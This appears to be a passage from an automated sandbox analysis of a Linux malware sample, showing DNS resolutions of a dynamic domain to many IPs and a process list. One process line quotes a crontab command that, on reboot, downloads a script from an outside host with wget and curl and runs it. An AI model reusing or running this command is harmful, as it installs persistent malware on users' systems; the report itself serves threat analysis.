                                    Oct 26, 2024 19:12:23.351807117 CEST194.36.144.87192.168.2.130x643cNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:23.351807117 CEST194.36.144.87192.168.2.130x643cNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:23.351807117 CEST194.36.144.87192.168.2.130x643cNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:23.351807117 CEST194.36.144.87192.168.2.130x643cNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:23.351807117 CEST194.36.144.87192.168.2.130x643cNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:23.351807117 CEST194.36.144.87192.168.2.130x643cNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:23.351807117 CEST194.36.144.87192.168.2.130x643cNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:23.351807117 CEST194.36.144.87192.168.2.130x643cNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:23.351807117 CEST194.36.144.87192.168.2.130x643cNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:29.253680944 CEST217.160.70.42192.168.2.130x686aNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:29.253680944 CEST217.160.70.42192.168.2.130x686aNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:29.253680944 CEST217.160.70.42192.168.2.130x686aNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:29.253680944 CEST217.160.70.42192.168.2.130x686aNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:29.253680944 CEST217.160.70.42192.168.2.130x686aNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:29.253680944 CEST217.160.70.42192.168.2.130x686aNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:29.253680944 CEST217.160.70.42192.168.2.130x686aNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:29.253680944 CEST217.160.70.42192.168.2.130x686aNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:29.253680944 CEST217.160.70.42192.168.2.130x686aNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:29.253680944 CEST217.160.70.42192.168.2.130x686aNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:29.253680944 CEST217.160.70.42192.168.2.130x686aNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false

                                    System Behavior

                                    Start time (UTC):17:12:10
                                    Start date (UTC):26/10/2024
                                    Path:/tmp/nsharm5.elf
                                    Arguments:/tmp/nsharm5.elf
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):17:12:10
                                    Start date (UTC):26/10/2024
                                    Path:/tmp/nsharm5.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):17:12:10
                                    Start date (UTC):26/10/2024
                                    Path:/bin/sh
                                    Arguments:sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
                                    File size:129816 bytes
                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                    Start time (UTC):17:12:10
                                    Start date (UTC):26/10/2024
                                    Path:/bin/sh
                                    Arguments:-
                                    File size:129816 bytes
                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                    Start time (UTC):17:12:10
                                    Start date (UTC):26/10/2024
                                    Path:/bin/sh
                                    Arguments:-
                                    File size:129816 bytes
                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                    Start time (UTC):17:12:10
                                    Start date (UTC):26/10/2024
                                    Path:/usr/bin/crontab
                                    Arguments:crontab -l
                                    File size:43720 bytes
                                    MD5 hash:66e521d421ac9b407699061bf21806f5

                                    Start time (UTC):17:12:10
                                    Start date (UTC):26/10/2024
                                    Path:/bin/sh
                                    Arguments:-
                                    File size:129816 bytes
                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                    Start time (UTC):17:12:10
                                    Start date (UTC):26/10/2024
                                    Path:/usr/bin/crontab
                                    Arguments:crontab -
                                    File size:43720 bytes
                                    MD5 hash:66e521d421ac9b407699061bf21806f5

                                    Start time (UTC):17:12:10
                                    Start date (UTC):26/10/2024
                                    Path:/tmp/nsharm5.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):17:12:11
                                    Start date (UTC):26/10/2024
                                    Path:/tmp/nsharm5.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):17:12:10
                                    Start date (UTC):26/10/2024
                                    Path:/tmp/nsharm5.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1